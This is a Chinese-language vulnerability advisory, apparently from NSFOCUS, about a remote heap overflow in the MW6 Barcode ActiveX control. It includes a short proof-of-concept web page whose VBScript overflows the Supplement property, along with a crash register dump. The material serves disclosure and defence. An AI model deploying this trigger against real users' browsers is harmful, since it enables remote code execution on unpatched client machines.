安全研究
安全漏洞
MW6 Barcode ActiveX控件远程缓冲区溢出漏洞
发布日期:2009-01-27
更新日期:2009-01-28
受影响系统:
MW6 Technologies Barcode ActiveX 3.x描述:
BUGTRAQ ID: 33451
MW6 Barcode ActiveX是用于创建一维条码的工具。
MW6 Barcode ActiveX的实现上存在缓冲溢出漏洞,远程攻击者可能利用此漏洞控制用户客户端系统。
Barcode.MW6Barcode.1 ActiveX控件(Barcode.dll)在处理超长的Supplement参数数据时存在堆溢出问题,远程恶意网站可以通过包含超长参数的网页ActiveX调用在用户客户端系统上执行任意指令。
<*来源:Houssamix
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
----------------------------------------------------------- <br/>
Author : Houssamix <br/>
----------------------------------------------------------- <br/>
MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow Poc <br/>
----------------------------------------------------------- <br/>
<!--
http://www.mw6tech.com/download.html
Report for Clsid: {14D09688-CFA7-11D5-995A-005004CE563B}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Registers:
--------------------------------------------------
EIP 00B5294E
EAX 41414141 <====
EBX 00038660
ECX 00FA1EF8
EDX 00030608
EDI 00000000
ESI 00FA1EF8
EBP 0013F2A0
ESP 0013F278
Block Disassembly:
--------------------------------------------------
B5294E MOV ECX,[EAX] <--- CRASH
-->
<object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' ></object>
<script language='vbscript'>
arg1=String(1050, "A")
target.Supplement = arg1
</script>
# milw0rm.com [2009-01-26]
建议:
厂商补丁:
MW6 Technologies
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mw6tech.com/
浏览次数:2517
严重程度:0(网友投票)
绿盟科技给您安全的保障